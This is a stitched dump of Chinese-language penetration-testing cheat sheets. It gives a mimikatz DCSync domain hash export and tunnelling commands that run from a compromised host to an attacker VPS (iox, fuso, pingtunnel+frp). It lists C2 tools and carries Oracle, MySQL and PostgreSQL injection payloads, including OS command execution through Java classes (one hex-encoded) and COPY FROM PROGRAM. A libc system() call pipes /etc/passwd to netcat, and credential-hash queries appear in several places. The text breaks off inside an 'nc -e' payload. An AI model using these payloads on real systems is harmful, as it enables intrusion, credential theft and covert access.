> C:\windows\temp\log.txt 52 | ``` 53 | 54 | ## 导出域内所有用户hash 55 | 56 | ``` 57 | mimikatz.exe "lsadump::dcsync /domain:test.com /all /csv" exit 58 | ``` -------------------------------------------------------------------------------- /工具使用命令速查/proxy.md: -------------------------------------------------------------------------------- 1 | # proxy tools 2 | 3 | ## iox 4 | 5 | 下载地址:https://github.com/EddieIvan01/iox 6 | 7 | ### proxy 8 | 9 | > 在本地 0.0.0.0:1080启动Socks5服务 10 | 11 | ``` 12 | ./iox proxy -l 1080 13 | ``` 14 | 15 | > 加密转发 socks5 代理: 16 | 17 | ``` 18 | VPS 监听(//将1080端口监听到的流量转发至50054端口): 19 | nohup ./iox proxy -l 50054 -l 1081 -k 3211 > iox.log & 20 | 21 | 在目标主机执行(//启动代理服务并发送至VPS 50054端口): 22 | ./iox proxy -r VPSIP:50054 -k 3211 23 | 24 | 然后本地socks5代理:socks5://vps:1081 25 | ``` 26 | 27 | ### fwd 28 | 29 | > 本地端口转发 3389 至VPS: 30 | ``` 31 | vps执行: 32 | nohup ./iox fwd -l *8888 -l 33890 -k 22222 33 | 34 | 目标机器执行: 35 | iox.exe fwd -r 192.168.0.1:3389 -r *VPSIP:8888 -k 22222 36 | 37 | 随后连接 VPS:33890 即可访问内网 3389 38 | ``` 39 | 40 | ## fuso 41 | 42 | Github:https://github.com/editso/fuso 43 | 44 | ### socks 45 | 46 | ``` 47 | VPS: 48 | ./fus 49 | 50 | //被控机 51 | ./fuc.exe VPSIP 6722 --socks 52 | ``` 53 | 54 | - linux:i686-unknown-linux-musl.zip 55 | - windows:x86_64-pc-windows-msvc.zip 56 | 57 | ### readme 58 | 59 | ``` 60 | 1. 端口转发 61 | fuc --forward-host xxx.xxx.xxx.xxx --forward-port 62 | --forward-host: 转发到的地址 63 | --forward-port: 转发到的端口 64 | 如: 转发流量到内网 10.10.10.4:3389 65 | > fuc --forward-host 10.10.10.4 --forward-port 3389 66 | 67 | 2. socks5: 68 | fuc --socks --su --s5p xxx --s5u xxx 69 | --su: 可选的, 开启udp转发, 70 | --s5p: 可选的, 认证密码, 默认不进行密码认证 71 | --s5u 可选的, 认证账号, 默认账号 anonymous 72 | --socks: 可选的, 开启socks5代理, 未指定--su的情况下不会转发udp 73 | 如: 开启udp转发与密码认证 74 | > fuc --socks --su --s5p 123 --s5u socks 75 | 此时, 已开启udp转发,连接密码为 "123",账号为 "socks" 76 | 77 | 3. 指定穿透成功时访问的端口 78 | fuc -b xxxx 79 | -b | --visit-bind-port: 可选的, 默认随机分配 80 | 如: 访问外网端口 8888 转发到内网 80 81 | > fuc --forward-port 80 -b 8888 82 | 83 | 4. 桥接模式 注意: 目前不能转发udp 84 | fuc --bridge-listen xxxx --bridge-port xxx 85 | --bridge-listen | --bl: 监听地址, 默认 127.0.0.1 86 | --bridge-port | --bp: 监听端口, 默认不启用桥接 87 | 如: 开始桥接模式,并监听在9999端口, 本机ip地址为: 10.10.10.2 88 | > fuc --bridge-listen 0.0.0.0 --bridge-port 9999 # 开启桥接 89 | > fuc 10.10.10.2 9999 # 建立连接 90 | 91 | 级联: 92 | > fuc --bridge-listen 0.0.0.0 --bridge-port 9999 # 第一级, IP: 10.10.10.2 93 | > fuc --bridge-listen 0.0.0.0 --bridge-port 9991 10.10.10.2 9999 # 第二级, IP: 10.10.10.3 94 | > fuc 10.10.10.3 9991 # 最终 95 | 96 | 5. 将连接信息通知到 Telegram 或其他 97 | fus --observer "program:[arguments]" 98 | --observer: 建立连接或断开连接时的钩子 99 | 如: 使用bash脚本将连接信息通知到tg 100 | > fus --observer "/bin/bash:[telegram.sh]" 101 | 102 | 6. 指定客户端与服务端通信的端口 103 | fuc --channel-port 8888 ... 104 | --channel-port: 可选的, 客户端与服务端通信端口, 默认随机 105 | ``` 106 | 107 | ## pingtunnel+frp 搭 icmp 隧道 108 | 109 | pingtunnel 下载:https://oss.ywhack.com/%E4%BB%A3%E7%90%86%E9%9A%A7%E9%81%93/pingtunnel-2.6 110 | 111 | ### 被控机 112 | 113 | ```bash 114 | nohup ./pingtunnel -type client -l 127.0.0.1:9999 -s vpsip -t vpsip:10000 -sock5 -1 -noprint 1 -nolog 1 >p.log & 115 | nohup ./frpc -c frpc.ini > fff.log & 116 | ``` 117 | 118 | pingtunnel -l 监听本地的9999端口 -s vps主机IP -t vps主机frp服务端口 119 | 120 | 客户端frp配置: 121 | 122 | ```ini 123 | [common] 124 | server_addr = 127.0.0.1 125 | server_port = 10000 126 | token = PassW0Rd 127 | 128 | [zhaoshangju_10078] 129 | type = tcp 130 | remote_port = 10015 131 | plugin = socks5 132 | plugin_user = thIsuserAS 133 | plugin_passwd = Passweqwe0Rm 134 | use_encryption = true 135 | ``` 136 | 137 | ### VPS 138 | 139 | ```bash 140 | ./pingtunnel -type server 141 | ./frps -c frps.ini 142 | ``` 143 | 144 | 本地代理vps的 10015 端口加上密码即可使用icmp隧道。 145 | 146 | 参考文章:https://www.cnblogs.com/cute-puli/p/15213394.html 147 | 148 | 149 | ## FRP 150 | 151 | * 将 frps 及 frps.ini 放到具有公网 IP 的机器上。 152 | * 将 frpc 及 frpc.ini 放到处于内网环境的机器上。 153 | 154 | - 客户端:frpc -c frpc.ini 155 | - 服务端:frps -c frps.ini 156 | 157 | Github:https://github.com/fatedier/frp 158 | 159 | ## 代理工具列表 160 | 161 | * \[2021.03.07\] - [proxifier 全平台代理工具,支持多种socks协议](https://www.proxifier.com/) 162 | * \[2021.03.07\] - [frp 专注于内网穿透的高性能的反向代理应用](https://github.com/fatedier/frp) 163 | * \[2021.03.07\] - [nps 轻量级、高性能、功能强大的内网穿透代理服务器](https://github.com/ehang-io/nps) 164 | * \[2021.03.07\] - [iox 端口转发 & 内网代理工具](https://github.com/EddieIvan01/iox) 165 | * \[2021.03.07\] - [Stowaway 面向渗透测试人员的多级代理工具](https://github.com/ph4ntonn/Stowaway) 166 | * \[2021.03.07\] - [rathole Rust 编写的安全、稳定、高性能的内网穿透工具](https://github.com/rapiz1/rathole) 167 | * \[2021.03.07\] - [rsocx 一款高性能的支持绑定/反向代理的 Socks5 工具](https://github.com/b23r0/rsocx) 168 | * \[2021.03.07\] - [rakshasa 基于go编写的跨平台、稳定、隐秘的多级代理内网穿透工具](https://github.com/Mob2003/rakshasa) 169 | * \[2021.03.07\] - [SwitchyOmega 浏览器的代理插件](https://github.com/FelisCatus/SwitchyOmega) 170 | * \[2021.03.07\] - [Neo-reGeorg 改进的reGeorg版本](https://github.com/L-codes/Neo-reGeorg) 171 | * \[2021.03.07\] - [dns2tcp是一款利用dns协议传输tcp数据的工具](https://github.com/alex-sector/dns2tcp) 172 | * \[2021.03.07\] - [dnscat2 是一个DNS隧道工具](https://github.com/iagox86/dnscat2) 173 | * \[2021.03.07\] - [ABPTTS 基于ssl加密的http隧道工具](https://github.com/nccgroup/ABPTTS) 174 | * \[2021.03.07\] - [Termite 内网渗透代理、端口转发工具](http://rootkiter.com/Termite/) 175 | * \[2021.03.07\] - [SSTap, 一款利用虚拟网卡在网络层实现的代理工具](https://github.com/FQrabbit/SSTap-Rule) 176 | * \[2021.03.07\] - [ew 用于开启 SOCKS v5 代理服务的工具(跨平台)](https://github.com/idlefire/ew) 177 | * \[2021.03.07\] - [n2n 开源的点对点穿透工具](https://github.com/ntop/n2n) 178 | * \[2021.03.07\] - [Ecloud 一款基于http/1.1协议传输TCP流量的工具](https://github.com/CTF-MissFeng/Ecloud) 179 | * \[2021.03.07\] - [icmpsh 一个简单的 reverse ICMP shell](https://github.com/inquisb/icmpsh) 180 | * \[2021.03.08\] - [ngrok 正/反向代理,内网穿透,端口转发](https://github.com/inconshreveable/ngrok) 181 | * \[2021.03.08\] - [ssf 全平台的加密隧道 端口转发工具](https://securesocketfunneling.github.io/ssf/) 182 | * \[2021.03.14\] - [proxychains 命令行代理神器](https://github.com/haad/proxychains) 183 | * \[2021.03.14\] - [switcher 一个多功能的端口转发/端口复用工具](https://github.com/crabkun/switcher) 184 | * \[2021.03.22\] - [pingtunnel 是把 tcp/udp/sock5 流量伪装成 icmp 流量进行转发的工具](https://github.com/esrrhs/pingtunnel) 185 | * \[2021.03.26\] - [chisel - 一款快速稳定的隧道工具](https://github.com/jpillora/chisel) 186 | * \[2021.03.29\] - [pystinger - 一款使用webshell进行流量转发的出网工具](https://github.com/FunnyWolf/pystinger) 187 | * \[2021.03.29\] - [pivotnacci - 通过HTTP代理建立socks连接的工具](https://github.com/blackarrowsec/pivotnacci) 188 | * \[2021.04.06\] - [lanproxy是一个将局域网个人电脑、服务器代理到公网的内网穿透工具](https://github.com/ffay/lanproxy) 189 | * \[2021.04.14\] - [Venom是一款为渗透测试人员设计的使用Go开发的多级代理工具](https://github.com/Dliv3/Venom) 190 | * \[2021.05.07\] - [goproxy 一款轻量级、功能强大、高性能的多种代理工具](https://github.com/snail007/goproxy) 191 | * \[2021.05.07\] - [SCFProxy 一个基于腾讯云函数服务的免费代理池](https://github.com/shimmeris/SCFProxy) 192 | * \[2021.06.21\] - [MOSN 是边缘或服务网格的云原生代理。](https://github.com/mosn/mosn) 193 | * \[2021.06.23\] - [C2ReverseProxy 一款可以在不出网的环境下进行反向代理及cs上线的工具](https://github.com/Daybr4ak/C2ReverseProxy) -------------------------------------------------------------------------------- /工具使用命令速查/后渗透工具列表.md: -------------------------------------------------------------------------------- 1 | # 后渗透工具列表 2 | 3 | ## f8x 4 | 5 | > 一款红/蓝队环境自动化部署工具,支持多种场景,渗透,开发,代理环境,服务可选项等 6 | 7 | - 项目地址:[https://github.com/ffffffff0x/f8x](https://github.com/ffffffff0x/f8x) 8 | - 中文文档:[https://github.com/ffffffff0x/f8x/blob/main/README.zh-cn.md](https://github.com/ffffffff0x/f8x/blob/main/README.zh-cn.md) 9 | 10 | ## Supershell 11 | 12 | > Supershell C2 远控平台,基于反向SSH隧道获取完全交互式Shell 13 | 14 | - 项目地址:[https://github.com/tdragon6/Supershell](https://github.com/tdragon6/Supershell) 15 | 16 | ## Viper 17 | 18 | > 互联网攻击面管理&红队模拟平台 19 | 20 | - 项目地址:[https://github.com/FunnyWolf/Viper](https://github.com/FunnyWolf/Viper) 21 | - 安装 or 使用手册:[https://www.yuque.com/vipersec/install/olg1ua](https://www.yuque.com/vipersec/install/olg1ua) 22 | 23 | ## Sliver C2 24 | 25 | > Sliver C2 是一个开源的跨平台红队框架。 26 | 27 | - 项目地址:[https://github.com/BishopFox/sliver](https://github.com/BishopFox/sliver) 28 | - [红队工具研究篇 - Sliver C2](https://forum.butian.net/share/2243) 29 | 30 | ## Impacket 31 | 32 | > 内网渗透 Python 工具包 33 | 34 | - 项目地址:[https://github.com/fortra/impacket](https://github.com/fortra/impacket) -------------------------------------------------------------------------------- /数据库命令速查/Oracle.md: -------------------------------------------------------------------------------- 1 | # oracle 2 | 3 | 相关工具: 4 | 5 | - [MDUT](https://github.com/SafeGroceryStore/MDUT) 6 | 7 | ## oracle查最大数量表 8 | 9 | ```sql 10 | select t.table_name,t.tablespace_name,t.owner,t.num_rows from all_tables t ORDER BY NUM_ROWS DESC; 11 | 12 | select t.table_name,t.tablespace_name,t.owner,t.num_rows from all_tables t ORDER BY NUM_ROWS DESC; 13 | select t.table_name tableName, f.comments comments 14 | from user_tables t 15 | inner join user_tab_comments f 16 | on t.table_name = f.table_name 17 | ``` 18 | 19 | ## 查询包含 user 字段在哪个库哪个表 20 | 21 | ```sql 22 | SELECT 23 | owner AS database_name, 24 | table_name, 25 | column_name 26 | FROM 27 | all_tab_columns 28 | WHERE 29 | column_name LIKE '%USER%' 30 | ORDER BY 31 | owner, table_name, column_name; 32 | ``` 33 | 34 | 35 | ## Oracle SQL 默认数据库 36 | 37 | | Name | Description | 38 | |--------------------|---------------------------| 39 | | SYSTEM | 适用于所有版本 | 40 | | SYSAUX | 适用于所有版本 | 41 | 42 | 43 | ## Oracle SQL 注释 44 | 45 | | Type | Description | 46 | |----------------------------|-----------------------------------| 47 | | `-- -` | SQL comment | 48 | 49 | 50 | ## Oracle SQL 版本 51 | 52 | ```sql 53 | SELECT user FROM dual UNION SELECT * FROM v$version 54 | SELECT banner FROM v$version WHERE banner LIKE 'Oracle%'; 55 | SELECT banner FROM v$version WHERE banner LIKE 'TNS%'; 56 | SELECT version FROM v$instance; 57 | ``` 58 | 59 | 60 | ## Oracle SQL 主机名 61 | 62 | ```sql 63 | SELECT host_name FROM v$instance; (Privileged) 64 | SELECT UTL_INADDR.get_host_name FROM dual; 65 | SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM dual; 66 | SELECT UTL_INADDR.get_host_address FROM dual; 67 | ``` 68 | 69 | 70 | ## Oracle SQL 数据库名称 71 | 72 | ```sql 73 | SELECT global_name FROM global_name; 74 | SELECT name FROM V$DATABASE; 75 | SELECT instance_name FROM V$INSTANCE; 76 | SELECT SYS.DATABASE_NAME FROM DUAL; 77 | ``` 78 | 79 | 80 | ## Oracle SQL 数据库凭证 81 | 82 | | SQL 语句 | 描述 | 83 | |-----------------------------------------|---------------------------| 84 | | `SELECT username FROM all_users;` | 适用于所有版本 | 85 | | `SELECT name, password from sys.user$;` | Privileged, <= 10g | 86 | | `SELECT name, spare4 from sys.user$;` | Privileged, <= 11g | 87 | 88 | 89 | ## Oracle SQL 列出数据库 90 | 91 | ```sql 92 | SELECT DISTINCT owner FROM all_tables; 93 | ``` 94 | 95 | 96 | ## Oracle SQL 列出列 97 | 98 | ```sql 99 | SELECT column_name FROM all_tab_columns WHERE table_name = 'blah'; 100 | SELECT column_name FROM all_tab_columns WHERE table_name = 'blah' and owner = 'foo'; 101 | ``` 102 | 103 | 104 | ## Oracle SQL 列出表 105 | 106 | ```sql 107 | SELECT table_name FROM all_tables; 108 | SELECT owner, table_name FROM all_tables; 109 | SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE '%PASS%'; 110 | ``` 111 | 112 | 113 | ## Oracle SQL 报错注入 114 | 115 | | Description | Query | 116 | | :-------------------- | :------------- | 117 | | Invalid HTTP Request | `SELECT utl_inaddr.get_host_name((select banner from v$version where rownum=1)) FROM dual` | 118 | | CTXSYS.DRITHSX.SN | `SELECT CTXSYS.DRITHSX.SN(user,(select banner from v$version where rownum=1)) FROM dual` | 119 | | Invalid XPath | `SELECT ordsys.ord_dicom.getmappingxpath((select banner from v$version where rownum=1),user,user) FROM dual` | 120 | | Invalid XML | `SELECT to_char(dbms_xmlgen.getxml('select "'||(select user from sys.dual)||'" FROM sys.dual')) FROM dual` | 121 | | Invalid XML | `SELECT rtrim(extract(xmlagg(xmlelement("s", username || ',')),'/s').getstringval(),',') FROM all_users` | 122 | | SQL Error | `SELECT NVL(CAST(LENGTH(USERNAME) AS VARCHAR(4000)),CHR(32)) FROM (SELECT USERNAME,ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=1))` | 123 | | XDBURITYPE getblob | `XDBURITYPE((SELECT banner FROM v$version WHERE banner LIKE 'Oracle%')).getblob()` | 124 | | XDBURITYPE getclob | `XDBURITYPE((SELECT table_name FROM (SELECT ROWNUM r,table_name FROM all_tables ORDER BY table_name) WHERE r=1)).getclob()` | 125 | 126 | When the injection point is inside a string use : `'||PAYLOAD--` 127 | 128 | 129 | ## Oracle SQL 盲注 130 | 131 | | Description | Query | 132 | | :----------------------- | :------------- | 133 | | Version is 12.2 | `SELECT COUNT(*) FROM v$version WHERE banner LIKE 'Oracle%12.2%';` | 134 | | Subselect is enabled | `SELECT 1 FROM dual WHERE 1=(SELECT 1 FROM dual)` | 135 | | Table log_table exists | `SELECT 1 FROM dual WHERE 1=(SELECT 1 from log_table);` | 136 | | Column message exists in table log_table | `SELECT COUNT(*) FROM user_tab_cols WHERE column_name = 'MESSAGE' AND table_name = 'LOG_TABLE';` | 137 | | First letter of first message is t | `SELECT message FROM log_table WHERE rownum=1 AND message LIKE 't%';` | 138 | 139 | 140 | ## Oracle SQL 时间注入 141 | 142 | ```sql 143 | AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) 144 | ``` 145 | 146 | 147 | ## Oracle SQL 命令执行 148 | 149 | * [ODAT (Oracle Database Attacking Tool)](https://github.com/quentinhardy/odat) 150 | 151 | ### Oracle Java Execution 152 | 153 | * List Java privileges 154 | ```sql 155 | select * from dba_java_policy 156 | select * from user_java_policy 157 | ``` 158 | * Grant privileges 159 | ```sql 160 | exec dbms_java.grant_permission('SCOTT', 'SYS:java.io.FilePermission','<>','execute'); 161 | exec dbms_java.grant_permission('SCOTT','SYS:java.lang.RuntimePermission', 'writeFileDescriptor', ''); 162 | exec dbms_java.grant_permission('SCOTT','SYS:java.lang.RuntimePermission', 'readFileDescriptor', ''); 163 | ``` 164 | * Execute commands 165 | * 10g R2, 11g R1 and R2: `DBMS_JAVA_TEST.FUNCALL()` 166 | ```sql 167 | SELECT DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper','main','c:\\windows\\system32\\cmd.exe','/c', 'dir >c:\test.txt') FROM DUAL 168 | SELECT DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper','main','/bin/bash','-c','/bin/ls>/tmp/OUT2.LST') from dual 169 | ``` 170 | * 11g R1 and R2: `DBMS_JAVA.RUNJAVA()` 171 | ```sql 172 | SELECT DBMS_JAVA.RUNJAVA('oracle/aurora/util/Wrapper /bin/bash -c /bin/ls>/tmp/OUT.LST') FROM DUAL 173 | ``` 174 | 175 | 176 | ### Oracle Java Class 177 | 178 | ```sql 179 | /* create Java class */ 180 | BEGIN 181 | EXECUTE IMMEDIATE 'create or replace and compile java source named "PwnUtil" as import java.io.*; public class PwnUtil{ public static String runCmd(String args){ try{ BufferedReader myReader = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(args).getInputStream()));String stemp, str = "";while ((stemp = myReader.readLine()) != null) str += stemp + "\n";myReader.close();return str;} catch (Exception e){ return e.toString();}} public static String readFile(String filename){ try{ BufferedReader myReader = new BufferedReader(new FileReader(filename));String stemp, str = "";while((stemp = myReader.readLine()) != null) str += stemp + "\n";myReader.close();return str;} catch (Exception e){ return e.toString();}}};'; 182 | END; 183 | / 184 | 185 | BEGIN 186 | EXECUTE IMMEDIATE 'create or replace function PwnUtilFunc(p_cmd in varchar2) return varchar2 as language java name ''PwnUtil.runCmd(java.lang.String) return String'';'; 187 | END; 188 | / 189 | 190 | /* run OS command */ 191 | SELECT PwnUtilFunc('ping -c 4 localhost') FROM dual; 192 | ``` 193 | 194 | or (hex encoded) 195 | 196 | ```sql 197 | /* create Java class */ 198 | SELECT TO_CHAR(dbms_xmlquery.getxml('declare PRAGMA AUTONOMOUS_TRANSACTION; begin execute immediate utl_raw.cast_to_varchar2(hextoraw(''637265617465206f72207265706c61636520616e6420636f6d70696c65206a61766120736f75726365206e616d6564202270776e7574696c2220617320696d706f7274206a6176612e696f2e2a3b7075626c696320636c6173732070776e7574696c7b7075626c69632073746174696320537472696e672072756e28537472696e672061726773297b7472797b4275666665726564526561646572206d726561643d6e6577204275666665726564526561646572286e657720496e70757453747265616d5265616465722852756e74696d652e67657452756e74696d6528292e657865632861726773292e676574496e70757453747265616d282929293b20537472696e67207374656d702c207374723d22223b207768696c6528287374656d703d6d726561642e726561644c696e6528292920213d6e756c6c29207374722b3d7374656d702b225c6e223b206d726561642e636c6f736528293b2072657475726e207374723b7d636174636828457863657074696f6e2065297b72657475726e20652e746f537472696e6728293b7d7d7d'')); 199 | EXECUTE IMMEDIATE utl_raw.cast_to_varchar2(hextoraw(''637265617465206f72207265706c6163652066756e6374696f6e2050776e5574696c46756e6328705f636d6420696e207661726368617232292072657475726e207661726368617232206173206c616e6775616765206a617661206e616d65202770776e7574696c2e72756e286a6176612e6c616e672e537472696e67292072657475726e20537472696e67273b'')); end;')) results FROM dual 200 | 201 | /* run OS command */ 202 | SELECT PwnUtilFunc('ping -c 4 localhost') FROM dual; 203 | ``` 204 | 205 | ## References 206 | 207 | > 注:大部分内容翻译至:[https://github.com/swisskyrepo/PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings) 208 | 209 | * [NetSpi - SQL Wiki](https://sqlwiki.netspi.com/injectionTypes/errorBased/#oracle) 210 | * [ASDC12 - New and Improved Hacking Oracle From Web - OWASP](https://owasp.org/www-pdf-archive/ASDC12-New_and_Improved_Hacking_Oracle_From_Web.pdf) 211 | * [Pentesting Oracle TNS Listener - HackTricks](https://book.hacktricks.xyz/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener) 212 | * [ODAT: Oracle Database Attacking Tool - quentinhardy](https://github.com/quentinhardy/odat/wiki/privesc) 213 | * [WebSec CheatSheet - Oracle](https://www.websec.ca/kb/sql_injection#Oracle_Default_Databases) 214 | * [New payload to exploit Error-based SQL injection - Oracle database - Mannu Linux - 12/09/2023](https://www.mannulinux.org/2023/12/New-payload-to-exploit-Error-based-SQL-injection-Oracle-database.html) 215 | * https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md -------------------------------------------------------------------------------- /数据库命令速查/mysql.md: -------------------------------------------------------------------------------- 1 | # mysql 2 | 3 | ## mysql 查连接 IP 4 | 5 | ``` 6 | SELECT * FROM performance_schema.hosts; 7 | show full processlist; 8 | ``` 9 | 10 | ## mysql 查最大数量表 11 | 12 | ``` 13 | select table_name,table_rows,table_schema,table_comment from information_schema.tables order by table_rows desc; 14 | ``` 15 | 16 | ## 查询 user 字段在哪个库哪个表 17 | 18 | ```sql 19 | SELECT 20 | TABLE_SCHEMA AS database_name, 21 | TABLE_NAME AS table_name, 22 | COLUMN_NAME AS column_name 23 | FROM 24 | INFORMATION_SCHEMA.COLUMNS 25 | WHERE 26 | COLUMN_NAME LIKE '%user%'; 27 | ``` 28 | 29 | ## 统计访问过的表次数 30 | 31 | ``` 32 | //库名,表名,访问次数 33 | select table_schema,table_name,sum(io_read_requests+io_write_requests) io from sys.schema_table_statistics group by table_schema,table_name order by io desc; 34 | ``` 35 | 36 | ## 查看写入权限 37 | 38 | ``` 39 | mysql> show global variables like '%secure%'; 40 | +------------------+-------+ 41 | | Variable_name | Value | 42 | +------------------+-------+ 43 | | secure_auth | ON | 44 | | secure_file_priv | | 可写入 45 | | secure_file_priv | NULL | 不可写入 46 | +------------------+-------+ 47 | ``` 48 | 49 | ``` 50 | SHOW VARIABLES LIKE "secure_file_priv"; 51 | ``` 52 | 53 | - NULL,表示禁止。 54 | - 如果value值有文件夹目录,则表示只允许该目录下文件,测试子目录也不行。 55 | - 如果为空,则表示不限制目录。 56 | 57 | ## 不登录执行 sql 58 | 59 | ``` 60 | mysql -uaHmin -proot test -e "select now()" -N >H:/work/target1.txt 61 | mysql -uroot -e "show databases;" >1.txt 62 | ``` 63 | 64 | 65 | ## 基础命令 66 | 67 | ``` 68 | 显示版本: select version(); 69 | 显示字符集: select @@character_set_database; 70 | 显示数据库: show databases; 71 | 显示表名: show tables; 72 | 显示字段: show columns from table_name; 73 | 显示计算机名: select @@hostname; 74 | 系统版本: select @@version_compile_os; 75 | mysql路径: select @@basedir; 76 | 数据库路径: select @@datadir; 77 | describe describe table_name; 78 | 显示root密码: select User,Password from mysql.user; 79 | 导入文件: select load_fie(0x633A5C5C77696E646F77735C73797374656D33325C5C696E65747372765C5C6D657461626173652E786D6C); 80 | 导出文件: select 'testtest' into outfile '/var/www/html/test.txt' from mysql.user; 81 | 开启外连: GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY 'root' WITH GRANT OPTION; 82 | mysql安装路径: show variables; 83 | 更新数据库: UPDATE `DX15`.`dx15_common_member` SET `uid` = '1' WHERE `dx15_common_member`.`uid` =40407;更新40407uid变成uid1 84 | mysql更改root密码: mysqladmin -u root password "newpwd"; 85 | 查询表: select concat(User,0x3a,Password) from mysql.user; 86 | 获取数据库所有表: SHOW TABLES FROM `databases`; 87 | 获取列前20行: SELECT * FROM `admin_bbs` ORDER BY 1 DESC LIMIT 0,20; 88 | 获取表行数: SELECT COUNT(*) AS CNT FROM `dede_admin`; 89 | ``` -------------------------------------------------------------------------------- /数据库命令速查/postgresql.md: -------------------------------------------------------------------------------- 1 | # postgresql 2 | 3 | ## PostgreSQL 命令执行 4 | 5 | ### CVE-2019–9193 6 | 7 | ``` 8 | DROP TABLE IF EXISTS cmd_exec; 9 | CREATE TABLE cmd_exec(cmd_output text); 10 | COPY cmd_exec FROM PROGRAM 'id'; 11 | SELECT * FROM cmd_exec; 12 | ``` 13 | 14 | ## 使用 libc.so.6 15 | 16 | ``` 17 | CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS '/lib/x86_64-linux-gnu/libc.so.6', 'system' LANGUAGE 'c' STRICT; 18 | SELECT system('cat /etc/passwd | nc '); 19 | ``` 20 | 21 | ## PostgreSQL 注释 22 | 23 | ``` 24 | -- 25 | /**/ 26 | ``` 27 | 28 | ## PostgreSQL 链注入点符号 29 | 30 | ``` 31 | ; #用于终止 SQL 命令。在语句中唯一可使用的位置是在字符串常量或引用标识符中。 32 | || #或语句 33 | 34 | # 使用示例: 35 | /?whatever=1;(select 1 from pg_sleep(5)) 36 | /?whatever=1||(select 1 from pg_sleep(5)) 37 | ``` 38 | 39 | ## PostgreSQL 版本 40 | 41 | ``` 42 | SELECT version() 43 | ``` 44 | 45 | ## PostgreSQL 当前用户 46 | 47 | ``` 48 | SELECT user; 49 | SELECT current_user; 50 | SELECT session_user; 51 | SELECT usename FROM pg_user; 52 | SELECT getpgusername(); 53 | ``` 54 | 55 | ## PostgreSQL 用户列表 56 | 57 | ``` 58 | SELECT usename FROM pg_user 59 | ``` 60 | 61 | ## PostgreSQL 密码哈希列表 62 | 63 | ``` 64 | SELECT usename, passwd FROM pg_shadow 65 | ``` 66 | 67 | ## 查询数据库管理员账户列表 68 | 69 | ``` 70 | SELECT usename FROM pg_user WHERE usesuper IS TRUE 71 | ``` 72 | 73 | ## PostgreSQL 权限列表 74 | 75 | ``` 76 | SELECT usename, usecreatedb, usesuper, usecatupd FROM pg_user 77 | ``` 78 | 79 | ## 查询当前用户是否为超级用户 80 | 81 | ``` 82 | SHOW is_superuser; 83 | SELECT current_setting('is_superuser'); 84 | SELECT usesuper FROM pg_user WHERE usename = CURRENT_USER; 85 | ``` 86 | 87 | ## PostgreSQL 数据库名称 88 | 89 | ``` 90 | SELECT current_database() 91 | ``` 92 | 93 | ## PostgreSQL 数据库列表 94 | 95 | ``` 96 | SELECT datname FROM pg_database 97 | ``` 98 | 99 | ## PostgreSQL 表格列表 100 | 101 | ``` 102 | SELECT table_name FROM information_schema.tables 103 | ``` 104 | 105 | ## PostgreSQL 列表列 106 | 107 | ``` 108 | SELECT column_name FROM information_schema.columns WHERE table_name='data_table' 109 | ``` 110 | 111 | ## PostgreSQL 报错注入 112 | 113 | ``` 114 | ,cAsT(chr(126)||vErSiOn()||chr(126)+aS+nUmeRiC) 115 | ,cAsT(chr(126)||(sEleCt+table_name+fRoM+information_schema.tables+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)-- 116 | ,cAsT(chr(126)||(sEleCt+column_name+fRoM+information_schema.columns+wHerE+table_name='data_table'+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)-- 117 | ,cAsT(chr(126)||(sEleCt+data_column+fRoM+data_table+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC) 118 | 119 | ' and 1=cast((SELECT concat('DATABASE: ',current_database())) as int) and '1'='1 120 | ' and 1=cast((SELECT table_name FROM information_schema.tables LIMIT 1 OFFSET data_offset) as int) and '1'='1 121 | ' and 1=cast((SELECT column_name FROM information_schema.columns WHERE table_name='data_table' LIMIT 1 OFFSET data_offset) as int) and '1'='1 122 | ' and 1=cast((SELECT data_column FROM data_table LIMIT 1 OFFSET data_offset) as int) and '1'='1 123 | ``` 124 | 125 | ## PostgreSQL XML 帮助器 126 | 127 | ``` 128 | select query_to_xml('select * from pg_user',true,true,''); -- 返回所有结果作为单个 xml 行 129 | select database_to_xml(true,true,''); -- 将当前数据库转储为 XML 130 | select database_to_xmlschema(true,true,''); -- 将当前数据库转储为 XML 架构 131 | ``` 132 | 133 | ## PostgreSQL 盲注 134 | 135 | ``` 136 | ' and substr(version(),1,10) = 'PostgreSQL' and '1' -> OK 137 | ' and substr(version(),1,10) = 'PostgreXXX' and '1' -> KO 138 | ``` 139 | 140 | ## PostgreSQL 时间盲注 141 | 142 | ``` 143 | select 1 from pg_sleep(5) 144 | ;(select 1 from pg_sleep(5)) 145 | ||(select 1 from pg_sleep(5)) 146 | 147 | select case when substring(datname,1,1)='1' then pg_sleep(5) else pg_sleep(0) end from pg_database limit 1 148 | select case when substring(table_name,1,1)='a' then pg_sleep(5) else pg_sleep(0) end from information_schema.tables limit 1 149 | select case when substring(column,1,1)='1' then pg_sleep(5) else pg_sleep(0) end from table_name limit 1 150 | select case when substring(column,1,1)='1' then pg_sleep(5) else pg_sleep(0) end from table_name where column_name='value' limit 1 151 | 152 | AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) 153 | AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) 154 | ``` 155 | 156 | ## PostgreSQL 堆叠查询 157 | 158 | ``` 159 | http://host/vuln.php?id=injection';create table NotSoSecure (data varchar(200));-- 160 | ``` 161 | 162 | ## PostgreSQL 文件读取 163 | 164 | ``` 165 | select pg_ls_dir('./'); 166 | select pg_read_file('PG_VERSION', 0, 200); 167 | ``` 168 | 169 | ## PostgreSQL 文件写入 170 | 171 | ``` 172 | CREATE TABLE pentestlab (t TEXT); 173 | INSERT INTO pentestlab(t) VALUES('nc -lvvp 2346 -e 